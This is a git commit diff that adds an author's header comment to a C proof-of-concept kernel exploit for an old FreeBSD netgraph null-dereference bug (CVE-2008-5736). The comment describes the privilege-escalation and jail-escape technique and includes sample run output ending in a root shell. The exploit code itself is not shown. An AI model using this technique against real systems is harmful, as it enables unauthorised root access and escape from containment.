Add l33t comment.

1 files changed, 38 insertions, 0 deletions

diff --git a/current-thread-exec.c b/current-thread-exec.c
index 7661fb3..53fa5ee 100644
--- a/current-thread-exec.c
+++ b/current-thread-exec.c
@@ -1,3 +1,41 @@
+/*
+ * This is an exploit for CVE-2008-5736, the FreeBSD protosw
+ * and loosely based on Don Bailey's 2008 exploit -
+ * http://www.exploit-db.com/exploits/7581/ . The thing with
+ * Don's exploit is that it relies on having a known location
+ * of allproc, which means having access to the kernel or
+ * debugging symbols, either of which might not be available.
+ * Initial attempts included a general memory search for some
+ * characteristics of allproc, but this was difficult to make
+ * reliable. This solution here is a much more standard - get
+ * the current thread, change its permissions, and execl to
+ * shell. Additionally, it breaks out of chroots and freebsd
+ * jails by reparenting to pid 1 and copying its fds.
+ *
+ * This reliably works on kernels on or below 6.4-RELEASE:
+ *
+ * $ gcc a.c
+ * $ ./a.out
+ * ~ FreeBSD <= 6.4-RELEASE Netgraph Exploit ~
+ * ~~~~~~~~~~~~~~~~~ by zx2c4 ~~~~~~~~~~~~~~~~
+ * ~~~~~ greetz to don bailey, edemveiss ~~~~~
+ *
+ * [+] mmapping null page
+ * [+] adding jmp to pwnage in null page
+ * [+] opening netgraph socket
+ * [+] triggering null dereference
+ * [+] elevating permissions
+ * [+] got root!
+ * #
+ *
+ * It's an oldie, but simple enough that someone needed
+ * to write another PoC exploit at some point.
+ *
+ * cheers,
+ * zx2c4, 27-2-2011
+ *
+ */
+
 #define _KERNEL
 #include <sys/types.h>
 #include <sys/time.h>